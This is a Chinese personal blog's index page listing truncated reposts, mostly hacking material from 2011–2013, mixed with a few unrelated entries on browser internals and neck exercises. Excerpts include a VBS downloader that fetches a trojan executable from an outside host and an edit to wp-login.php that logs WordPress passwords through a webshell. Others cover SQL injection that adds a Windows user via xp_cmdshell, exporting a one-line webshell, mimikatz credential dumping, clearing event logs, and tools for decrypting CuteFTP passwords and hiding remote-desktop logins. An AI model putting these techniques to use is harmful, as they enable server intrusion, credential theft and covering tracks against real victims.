- 博客(82)
- 资源 (8)
- 收藏
- 关注
RSS订阅转载 VBS下载者
一、VBS下载者:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.03389.com/muma.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")
2013-11-13 16:34:31
784
转载 Javascript 装载和执行
http://coolshell.cn/articles/9749.html一两个月前在淘宝内网里看到一个优化Javascript代码的竞赛,发现有不少的人对Javascript的执行和装载的基础并不懂,所以,从那天起我就想写一篇文章,但一直耽搁了。自上篇《浏览器渲染原理简介》,正好也可以承前启后。首先,我想说一下Javascript的装载和执行。通常来说,浏览器对于Javascr
2013-10-14 16:08:41
595
转载 浏览器的渲染原理简介
http://coolshell.cn/articles/9666.html看到这个标题大家一定会想到这篇神文《How Browsers Work》,这篇文章把浏览器的很多细节讲得很细,而且也被翻译成了中文。为什么我还想写一篇呢?因为两个原因,1)这篇文章太长了,阅读成本太大,不能一口气读完。2)花了大力气读了这篇文章后可以了解很多,但似乎对工作没什么帮助。所以,我准备
2013-10-14 12:04:02
592
转载 浏览器的工作原理:新式网络浏览器幕后揭秘
英文原文链接:http://taligarsiel.com/Projects/howbrowserswork1.htm译文链接:http://www.html5rocks.com/zh/tutorials/internals/howbrowserswork/#The_browsers_we_will_talk_about序言这是一篇全面介绍 Webkit 和
2013-10-13 09:31:04
795
转载 实战 SSH 端口转发
http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html实战 SSH 端口转发通过本文的介绍,读者可以从中了解到如何应用 SSH 端口转发机制来解决日常工作 /生活中的一些问题。学会在非安全环境下使用端口转发来加密网络应用,保护个人隐私以及重要商业信息。同时也能够用此技术解决工作中一些常见问题
2013-10-12 21:24:18
587
转载 VC6.0安装Boost以支持正则表达式
支持正则的库 大概有以下几种:boost,GNU,VC7 带的 ATL 中的和微软发布的 greta。 网上的朋友对 boost 评价不错。1、 下载 boost 库, 解压的目录是 D:\boost2、 编译,因为只要支持正则表达式就可以,因此只需要编译 D:\boost\libs\regex\build 目录下的文件。 在“运行”里输入“cmd”,打开命令提示符
2013-10-12 16:09:06
593
转载 ASP WEBSHELL权限总结
文章作者:enterer博客:www.enterer.cn转载请保留我为什么会写这篇文章呢,当然是因为我很闲(误)。因为本人虽然是个菜鸟,学习也就4个多月,但是觉得应该写些东西和大家交流。本人是提权爱好者,虽然技术一般,但是有耐心些出来和大家交流交流。打算写个提权的系列文章,汗,本人也只是小白而已。提 权的基础是什么呢?拿到一个webshell,你最想干什么呢,当然是拿下服务器了。
2013-10-12 16:07:03
2750
转载 webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['pwd']; $log_ip=$_SERVER["R
2012-08-14 17:02:45
1602
转载 ACCESS导出一句话SHELL
1.create table cmd (a varchar(50))2.insert into cmd (a) values (‘’)3.select * into [a] in ‘C:\\www.tmdsb.com\\tmdsb.asa;.xls’ ‘excel 4.0;’ from cmd(把表cmd的内容导出为物理路径的一个EXCEL文件)4.drop table cmd
2012-08-14 11:50:29
390
转载 Backup / delete event log files
http://www.windows-commandline.com/2011/12/backup-delete-event-log-files.htmlWe can delete or backup event log files from command line using wmiccommands. The wmic sub command for managing eve
2012-03-30 12:29:08
609
转载 How to clear windows run history
http://www.windows-commandline.com/2009/11/how-to-clear-windows-run-history.htmlWindows stores the list of the commands we have executed from Run window. This‘Run’ command history can be see
2012-03-30 12:27:57
867
原创 XP多用户登陆
1、关闭服务tasklist /svc | findstr /C:TermService,查看如果Terminal Services没有和其它服务共享svchost.exe进程则运行taskkill /F /PID process_id 关闭该进程即可,之后通过net start TermService重启服务如果Terminal Services与其它服务共享了这一进程,如
2012-03-30 12:26:52
609
转载 Start / Stop / Enable / Disable Terminal services from command line
http://www.windows-commandline.com/2010/10/start-terminal-services-command-line.htmlHow to start Terminal Services from command line?We can start Terminal Services from command line by runni
2012-03-29 11:51:03
1258
1
转载 HttpTunnel--穿透防火墙的利器
使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对方通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包转交到相应的服务器上。 http://www.http-tunnel
2012-03-23 13:12:54
1225
转载 winpcap静默安装小结
下面的内容基本上来自参考网站[1]、[2]、[3],做个小结免得到时候又要搜索。由于用了winpcap抓包,必须先安装它,又不想装两次exe因此考虑静默安装——silent install。1、从官方网站http://www.winpcap.org/archive/下载exe 我选用4.1.1-Winpcap.exe。2、使用7zip将exe解压,注意选择自动重命名。3
2012-02-27 18:23:41
1909
转载 windows神器 - mimikatz
法国佬写的神器叫 mimikatz 神器下载地址: http://blog.gentilkiwi.com/mimikatz还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章。http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwor
2012-02-27 12:22:16
1383
转载 Access数据库注入高级玩法
http://ynhu33.blog.51cto.com/412835/259144Access数据库注入高级玩法,鉴于论坛的朋友要求,在这整理下,以飨读者。Access数据库想对于MsSql来说可谓小巫见大巫,但是Acc的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。一,基础篇1、猜解表名,这里借用啊D的语句:and
2012-02-21 13:30:49
662
翻译 Access SQL注入参考
Access SQL注入参考 描述SQL查询及注释注释符Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替:' UNION SELECT 1,1,1 FROM validTableName%00语法错误信息"[Microsoft][Driver ODB
2012-02-17 18:00:43
655
转载 利用系统表注入SQLServer数据库
SQL Server是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 分号;在SQLServer中表示
2012-02-17 11:56:48
392
转载 注入过程中的中文处理方法
中文处理方法 在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。 先说一点常识: Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。 SQL Server中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能
2012-02-15 12:58:46
377
转载 SQL注入常用函数
SQL注入常用函数 有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc
2012-02-15 12:57:40
801
转载 注入中表格长度限制的突破
链接地址:http://www.5778.com/help/safe/safe2_3.htm在表格页上加一些限制,比如maxlength等等,攻击者可以突破sql注入攻击时输入框长度的限制.写一个SOCKET程序改变HTTP_REFERER?我不会。网上发表了这样一篇文章:------------len.reG----------------- Windows R
2012-02-15 12:43:15
610
转载 SQLServer与Access数据库的判别方法
不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。 怎么让程序告诉你它使用的什么数据库呢?来看看: SQLServer有一些系统变量,如果服务器IIS提示没关闭,并且SQLServer返回错误提示的话,那可以直接从出错信息获取,方法如下
2012-02-15 11:52:14
715
转载 免费ssh通道实现代理MyEnTunnel
使用MyEnTunnel和WinSCP连接linode上的Ubuntu服务器作者:lizongbo 发表于:17:34. 星期日, 十一月 14th, 2010版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明。http://618119.com/archives/2010/11/14/190.html先安装配置MyEnTunnel:1.My
2012-02-07 22:40:56
8276
转载 Windows 2003 下 SquirrelMail 的安装
(一) 软件下载:1. 下载 squirrelmail-1.4.11.zip 地址:http://squirrelmail.org/2. 下载 ActivePerl-5.8.8.822-MSWin32-x86-280952.msi 地址:http://www.activestate.com/ActivePerl/3. 下载 hMailServer-4.4-B270.exe 地址:htt
2012-01-11 18:02:40
1674
转载 mysql中的char函数用法
CHAR(N,... [USING charset]) CHAR()将每个参数N理解为一个整数,其返回值为一个包含这些整数的代码值所给出的字符的字符串。NULL值被省略。mysql> SELECT CHAR(77,121,83,81,'76'); -> 'MySQL'mysql> SELECT CHAR(77,77.3,'77.3'); -> '
2011-12-21 11:33:11
10826
转载 NC的用法
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 下载:http://d
2011-12-10 18:29:00
920
原创 HTML URL 编码
参考网址:http://www.w3schools.com/cn/tags/ref_urlencode.aspURL编码(URL encoding)的作用是将字符转化为可在因特网上安全传输的格式。URL——统一资源定位符Web浏览器通过URL从Web服务器
2011-09-01 19:16:02
8547
1
原创 SQL语法摘要
1、SQL 对大小写不敏感,但对其中存入的数据敏感2、分号是在数据库系统中分隔每条 SQL 语句的标准方法,这样就可以在对服务器的相同请求中执行一条以上的语句。如果您使用的是 MS Access 和 SQL Server 2000,则不必在每条 SQL 语句之后使用分号,
2011-09-01 18:18:08
504
转载 ASP 获取浏览器信息 Request.ServerVariables集合详解
Request.ServerVariables集合详解 语法: Request.ServerVariables (server environment variable) 参数 服务器环境变量 指定要检索的服务器环境变量名。可以使用下面列出的值。变量 说明
2011-08-24 13:01:57
1163
转载 nmap扫描时的2个小经验
From:Mickey 1.我肉鸡的环境是Windows XP sp3,在使用nmap扫描外网的时候,提示我pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter:
2011-08-16 16:56:00
1049
原创 颈椎操
近来感觉颈椎不大舒服,电脑前面坐久了没注意好休息,在网上搜到一些锻炼方法:1、颈椎病医疗体操2、滚背站立歪斜或坐姿不端正、習慣性翹腳、長時間坐在電腦前都會造成我們脊椎歪曲不直,脊椎一旦彎曲歪斜,很多毛病會跟著來,所以可以常常做滾背的動作,可以矯正脊椎,甚至有人
2011-08-09 18:36:14
2329
转载 伪造浏览器的状态栏--IE和FireFox的ClickJacking
方法一:先看下面一段代码:--------------------------------------------------------------------------------------------------------------<div
2011-08-03 16:43:29
530
转载 Backdoor Webserver using MySQL-SQL Injection
What is SQL Injection?SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing
2011-07-28 18:17:19
486
转载 IDA识别程序中密码算法插件 FindCrypt2
参见:http://www.openrce.org/downloads/details/189/FindCrypt2一个用于在IDA中识别反汇编后程序中所使用的密码学算法插件,支持的密码学算法有:* Blowfish* Camellia* CAST* CAST
2011-07-06 00:27:00
5155
转载 SSL漏洞及其利用工具(SSL会话劫持)
各种安全会议都提到了SSL的问题。独立安全专家Moxie Marlinspike 用相当令人信服的证据解释了他是如何绕过SSL安全机制的。SSL漏洞利用的新工具 SSL Strip,让人们再次为 WiFi 和 洋葱代理网络的安全而担.SSL Strip (下称
2011-07-06 00:16:24
2937
转载 详解Apache下.htaccess文件常用配置
.htaccess文件是Apache服务器中最常用的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置索引入口等功能。 另外,.htaccess手动编辑方法是使用UE或notepad2等高级文本编辑器。如果不方便下载或手动编写的文件出错
2011-06-21 11:34:00
343
转载 从CuteFTP的sm.dat中获取密码
CuteFTP PRO的站点信息全部记录在SM.dat文件里面 SM.dat的位置 Win98 "X":/WINDOWS/Application Data/GlobalSCAPE/CuteFTP Pro/"Y" Winxp X:/Documents and Settings/(*你登录的帐号*)/Application Data/GlobalSCAPE/CuteFTP
2011-06-15 13:56:00
4417
1
转载 更改3389端口
1、通过注册表修改,打开“开始→运行”,输入“regedit”,打开注册表,进入以下路径: [HKEY_LOCAL_MACHINE--SYSTEM CurrentControlSet--Control--Terminal Server Wds--rdpwd--Tds--tcp],看见PortNamber值了吗?其默认值是3389,修改成所希望的端口即可,例如12345。 再打开[HKEY_L
2011-06-13 16:39:00
528
XP多用户远程桌面补丁termsrv.dll
2012-03-29
XP多用户使用远程桌面补丁termsrv.dll
2012-03-29
CuteFTP网站记录文件解密工具
2011-06-15
隐藏mstsc登录信息的dll
2011-06-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人